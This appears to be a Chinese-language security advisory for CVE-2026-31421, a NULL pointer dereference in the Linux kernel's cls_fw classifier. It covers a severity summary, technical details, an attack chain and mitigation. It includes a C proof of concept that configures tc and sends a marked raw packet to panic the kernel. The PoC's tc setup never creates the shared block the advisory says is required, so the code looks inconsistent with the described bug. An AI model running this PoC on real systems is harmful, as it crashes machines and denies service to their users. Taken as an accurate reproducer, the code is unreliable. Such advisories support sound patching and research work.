CVE-2026-31421 CVSS 5.5 中危

CVE-2026-31421 Linux内核cls_fw空指针解引用漏洞

披露日期: 2026-04-13

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31421

漏洞类型

空指针解引用 (拒绝服务)

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux内核

漏洞概述

Linux内核net/sched模块的cls_fw组件存在空指针解引用漏洞。当在共享块上使用旧方法配置cls_fw过滤器，并处理带有非零skb标记的数据包时，由于未对block->q进行非空检查，导致内核崩溃。本地低权限攻击者可利用此漏洞造成拒绝服务。

技术细节

该漏洞位于Linux内核的net/sched/cls_fw.c文件中。问题出在fw_classify()函数处理“旧方法”分类路径时，该路径会调用tcf_block_q()并尝试解引用q->handle指针。然而，当cls_fw过滤器被附加到共享块时，block->q指针会被设置为NULL。如果此时有一个带有非零主skb标记的数据包经过该过滤器，fw_classify()会执行旧方法逻辑，导致对NULL指针的解引用访问（偏移量0x38）。这会触发KASAN报告并导致内核恐慌。修复补丁通过在fw_change()函数中增加检查，拒绝在共享块上使用旧方法配置cls_fw，从而防止了NULL指针的解引用。

攻击链分析

STEP 1

步骤1

攻击者获取本地低权限访问权限（PR:L）。

STEP 2

步骤2

攻击者配置流量控制（tc），在共享块上使用旧方法（无TCA_OPTIONS）绑定cls_fw过滤器。

STEP 3

步骤3

攻击者发送一个带有非零skb标记的网络数据包。

STEP 4

步骤4

内核在fw_classify中处理该数据包，触发空指针解引用，导致系统崩溃（DoS）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <linux/if_ether.h>

/*
 * PoC for CVE-2026-31421
 * Trigger: NULL pointer dereference in fw_classify
 * Context: Requires CAP_NET_ADMIN to setup tc, but trigger is via packet flow.
 */

void setup_tc_poc() {
    // Commands to reproduce the vulnerable state:
    // 1. Create a qdisc with clsact
    system("tc qdisc add dev lo root handle 1: clsact");
    
    // 2. Attach cls_fw filter using the 'old method' (no TCA_OPTIONS) to a shared block context
    // This specific configuration triggers the bug when block->q is NULL.
    system("tc filter add dev lo protocol ip parent 1:0 prio 1 handle ::1 fw");
}

void trigger_packet() {
    int sock;
    struct sockaddr_in addr;
    char packet[64];
    int mark = 1; // Non-zero mark is required to hit the old-method path

    sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (sock < 0) {
        perror("socket");
        return;
    }

    // Set the socket mark to trigger the specific classify path
    if (setsockopt(sock, SOL_SOCKET, SO_MARK, &mark, sizeof(mark)) < 0) {
        perror("setsockopt");
        close(sock);
        return;
    }

    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(80);
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);

    memset(packet, 0x41, sizeof(packet));

    // Send packet to trigger classification and crash
    sendto(sock, packet, sizeof(packet), 0, (struct sockaddr*)&addr, sizeof(addr));
    
    printf("Packet sent. If vulnerable, kernel panic should occur.\n");
    close(sock);
}

int main() {
    printf("Setting up tc configuration (requires root/CAP_NET_ADMIN)...\n");
    setup_tc_poc();
    
    printf("Triggering packet...\n");
    trigger_packet();
    
    return 0;
}

影响范围

Linux Kernel

防御指南

临时缓解措施

避免在共享块上使用旧方法配置cls_fw过滤器，直至应用内核安全补丁。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表